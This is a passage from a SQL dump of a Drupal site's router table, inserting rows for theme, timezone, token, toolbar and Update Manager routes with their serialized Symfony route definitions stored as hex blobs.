0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33343a222f61646d696e2f617070656172616e63652f73657474696e67732f7b7468656d657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a33373a225c44727570616c5c73797374656d5c466f726d5c5468656d6553657474696e6773466f726d223b733a31353a225f7469746c655f63616c6c6261636b223b733a32313a227468656d655f68616e646c65723a6765744e616d65223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31373a2261646d696e6973746572207468656d6573223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a353a227468656d65223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a35313a227b5e2f61646d696e2f617070656172616e63652f73657474696e67732f283f503c7468656d653e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a353a227468656d65223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a32363a222f61646d696e2f617070656172616e63652f73657474696e6773223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a353a227468656d65223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31343b733a31343a227061747465726e4f75746c696e65223b733a32383a222f61646d696e2f617070656172616e63652f73657474696e67732f25223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('system.theme_set_default', '/admin/appearance/default', '/admin/appearance/default', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32353a222f61646d696e2f617070656172616e63652f64656661756c74223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a363a225f7469746c65223b733a32303a225365742061732064656661756c74207468656d65223b733a31313a225f636f6e74726f6c6c6572223b733a35383a225c44727570616c5c73797374656d5c436f6e74726f6c6c65725c5468656d65436f6e74726f6c6c65723a3a73657444656661756c745468656d65223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31313a225f7065726d697373696f6e223b733a31373a2261646d696e6973746572207468656d6573223b733a31313a225f637372665f746f6b656e223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b693a313b733a31373a226163636573735f636865636b2e63737266223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33323a227b5e2f61646d696e2f617070656172616e63652f64656661756c74247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32353a222f61646d696e2f617070656172616e63652f64656661756c74223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a32353a222f61646d696e2f617070656172616e63652f64656661756c74223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('system.theme_uninstall', '/admin/appearance/uninstall', '/admin/appearance/uninstall', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32373a222f61646d696e2f617070656172616e63652f756e696e7374616c6c223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a35323a225c44727570616c5c73797374656d5c436f6e74726f6c6c65725c5468656d65436f6e74726f6c6c65723a3a756e696e7374616c6c223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31313a225f7065726d697373696f6e223b733a31373a2261646d696e6973746572207468656d6573223b733a31313a225f637372665f746f6b656e223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b693a313b733a31373a226163636573735f636865636b2e63737266223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33343a227b5e2f61646d696e2f617070656172616e63652f756e696e7374616c6c247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32373a222f61646d696e2f617070656172616e63652f756e696e7374616c6c223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a32373a222f61646d696e2f617070656172616e63652f756e696e7374616c6c223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('system.timezone', '/system/timezone/{abbreviation}/{offset}/{is_daylight_saving_time}', '/system/timezone', 3, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36363a222f73797374656d2f74696d657a6f6e652f7b616262726576696174696f6e7d2f7b6f66667365747d2f7b69735f6461796c696768745f736176696e675f74696d657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a31313a225f636f6e74726f6c6c6572223b733a35373a225c44727570616c5c73797374656d5c436f6e74726f6c6c65725c54696d657a6f6e65436f6e74726f6c6c65723a3a67657454696d657a6f6e65223b733a31323a22616262726576696174696f6e223b733a303a22223b733a363a226f6666736574223b693a2d313b733a32333a2269735f6461796c696768745f736176696e675f74696d65223b4e3b7d733a31323a22726571756972656d656e7473223b613a343a7b733a373a225f616363657373223b733a343a2254525545223b733a31323a22616262726576696174696f6e223b733a31343a22307c285b412d5a5d7b332c357d29223b733a363a226f6666736574223b733a363a225c2d3f5c642b223b733a32333a2269735f6461796c696768745f736176696e675f74696d65223b733a373a225c2d317c307c31223b7d733a373a226f7074696f6e73223b613a333a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32303a226163636573735f636865636b2e64656661756c74223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a333a7b693a303b733a31323a22616262726576696174696f6e223b693a313b733a363a226f6666736574223b693a323b733a32333a2269735f6461796c696768745f736176696e675f74696d65223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3132393a227b5e2f73797374656d2f74696d657a6f6e65283f3a2f283f503c616262726576696174696f6e3e307c283f3a5b412d5a5d7b332c357d2929283f3a2f283f503c6f66667365743e5c2d3f5c642b29283f3a2f283f503c69735f6461796c696768745f736176696e675f74696d653e5c2d317c307c3129293f293f293f247d734475223b733a31313a22706174685f746f6b656e73223b613a343a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a373a225c2d317c307c31223b693a333b733a32333a2269735f6461796c696768745f736176696e675f74696d65223b693a343b623a313b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225c2d3f5c642b223b693a333b733a363a226f6666736574223b693a343b623a313b7d693a323b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a31363a22307c283f3a5b412d5a5d7b332c357d29223b693a333b733a31323a22616262726576696174696f6e223b693a343b623a313b7d693a333b613a323a7b693a303b733a343a2274657874223b693a313b733a31363a222f73797374656d2f74696d657a6f6e65223b7d7d733a393a22706174685f76617273223b613a333a7b693a303b733a31323a22616262726576696174696f6e223b693a313b733a363a226f6666736574223b693a323b733a32333a2269735f6461796c696768745f736176696e675f74696d65223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a333b733a31343a227061747465726e4f75746c696e65223b733a31363a222f73797374656d2f74696d657a6f6e65223b733a383a226e756d5061727473223b693a353b7d7d, 5),
('token.tree', '/token/tree', '/token/tree', 3, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a31313a222f746f6b656e2f74726565223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a35363a225c44727570616c5c746f6b656e5c436f6e74726f6c6c65725c546f6b656e54726565436f6e74726f6c6c65723a3a6f757470757454726565223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f637372665f746f6b656e223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a333a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31373a226163636573735f636865636b2e63737266223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a31383a227b5e2f746f6b656e2f74726565247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31313a222f746f6b656e2f74726565223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a333b733a31343a227061747465726e4f75746c696e65223b733a31313a222f746f6b656e2f74726565223b733a383a226e756d5061727473223b693a323b7d7d, 2),
('toolbar.subtrees', '/toolbar/subtrees/{hash}', '/toolbar/subtrees/%', 6, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32343a222f746f6f6c6261722f73756274726565732f7b686173687d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a35383a225c44727570616c5c746f6f6c6261725c436f6e74726f6c6c65725c546f6f6c626172436f6e74726f6c6c65723a3a7375627472656573416a6178223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f637573746f6d5f616363657373223b733a36343a225c44727570616c5c746f6f6c6261725c436f6e74726f6c6c65725c546f6f6c626172436f6e74726f6c6c65723a3a636865636b53756254726565416363657373223b7d733a373a226f7074696f6e73223b613a333a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e637573746f6d223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a343a2268617368223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34313a227b5e2f746f6f6c6261722f73756274726565732f283f503c686173683e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a343a2268617368223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a31373a222f746f6f6c6261722f7375627472656573223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a343a2268617368223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a363b733a31343a227061747465726e4f75746c696e65223b733a31393a222f746f6f6c6261722f73756274726565732f25223b733a383a226e756d5061727473223b693a333b7d7d, 3);
INSERT INTO `router` (`name`, `path`, `pattern_outline`, `fit`, `route`, `number_parts`) VALUES
('update.confirmation_page', '/admin/update/ready', '/admin/update/ready', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a31393a222f61646d696e2f7570646174652f7265616479223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a33313a225c44727570616c5c7570646174655c466f726d5c5570646174655265616479223b733a363a225f7469746c65223b733a31353a22526561647920746f20757064617465223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32373a2261646d696e697374657220736f6674776172652075706461746573223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32363a227b5e2f61646d696e2f7570646174652f7265616479247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31393a222f61646d696e2f7570646174652f7265616479223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a31393a222f61646d696e2f7570646174652f7265616479223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('update.manual_status', '/admin/reports/updates/check', '/admin/reports/updates/check', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32383a222f61646d696e2f7265706f7274732f757064617465732f636865636b223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a363a225f7469746c65223b733a31393a224d616e75616c2075706461746520636865636b223b733a31313a225f636f6e74726f6c6c6572223b733a36343a225c44727570616c5c7570646174655c436f6e74726f6c6c65725c557064617465436f6e74726f6c6c65723a3a7570646174655374617475734d616e75616c6c79223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31313a225f7065726d697373696f6e223b733a32393a2261646d696e6973746572207369746520636f6e66696775726174696f6e223b733a31313a225f637372665f746f6b656e223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b693a313b733a31373a226163636573735f636865636b2e63737266223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33353a227b5e2f61646d696e2f7265706f7274732f757064617465732f636865636b247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32383a222f61646d696e2f7265706f7274732f757064617465732f636865636b223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a32383a222f61646d696e2f7265706f7274732f757064617465732f636865636b223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('update.module_update', '/admin/modules/update', '/admin/modules/update', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32313a222f61646d696e2f6d6f64756c65732f757064617465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a33393a225c44727570616c5c7570646174655c466f726d5c5570646174654d616e61676572557064617465223b733a363a225f7469746c65223b733a363a22557064617465223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32373a2261646d696e697374657220736f6674776172652075706461746573223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32383a227b5e2f61646d696e2f6d6f64756c65732f757064617465247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32313a222f61646d696e2f6d6f64756c65732f757064617465223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a32313a222f61646d696e2f6d6f64756c65732f757064617465223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('update.report_update', '/admin/reports/updates/update', '/admin/reports/updates/update', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32393a222f61646d696e2f7265706f7274732f757064617465732f757064617465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a33393a225c44727570616c5c7570646174655c466f726d5c5570646174654d616e61676572557064617465223b733a363a225f7469746c65223b733a363a22557064617465223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32373a2261646d696e697374657220736f6674776172652075706461746573223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33363a227b5e2f61646d696e2f7265706f7274732f757064617465732f757064617465247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7265706f7274732f757064617465732f757064617465223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a32393a222f61646d696e2f7265706f7274732f757064617465732f757064617465223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('update.settings', '/admin/reports/updates/settings', '/admin/reports/updates/settings', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33313a222f61646d696e2f7265706f7274732f757064617465732f73657474696e6773223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a33333a225c44727570616c5c7570646174655c55706461746553657474696e6773466f726d223b733a363a225f7469746c65223b733a32333a22557064617465204d616e616765722073657474696e6773223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32393a2261646d696e6973746572207369746520636f6e66696775726174696f6e223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33383a227b5e2f61646d696e2f7265706f7274732f757064617465732f73657474696e6773247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a33313a222f61646d696e2f7265706f7274732f757064617465732f73657474696e6773223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a33313a222f61646d696e2f7265706f7274732f757064617465732f73657474696e6773223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('update.status', '/admin/reports/updates', '/admin/reports/updates', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32323a222f61646d696e2f7265706f7274732f75706461746573223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a35363a225c44727570616c5c7570646174655c436f6e74726f6c6c65725c557064617465436f6e74726f6c6c65723a3a757064617465537461747573223b733a363a225f7469746c65223b733a31373a22417661696c61626c652075706461746573223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32393a2261646d696e6973746572207369746520636f6e66696775726174696f6e223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32393a227b5e2f61646d696e2f7265706f7274732f75706461746573247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32323a222f61646d696e2f7265706f7274732f75706461746573223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a32323a222f61646d696e2f7265706f7274732f75706461746573223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('update.theme_update', '/admin/appearance/update', '/admin/appearance/update', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32343a222f61646d696e2f617070656172616e63652f757064617465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a33393a225c44727570616c5c7570646174655c466f726d5c5570646174654d616e61676572557064617465223b733a363a225f7469746c65223b733a363a22557064617465223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32373a2261646d696e697374657220736f6674776172652075706461746573223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33313a227b5e2f61646d696e2f617070656172616e63652f757064617465247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32343a222f61646d696e2f617070656172616e63652f757064617465223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a32343a222f61646d696e2f617070656172616e63652f757064617465223b733a383a226e756d5061727473223b693a333b7d7d, 3),
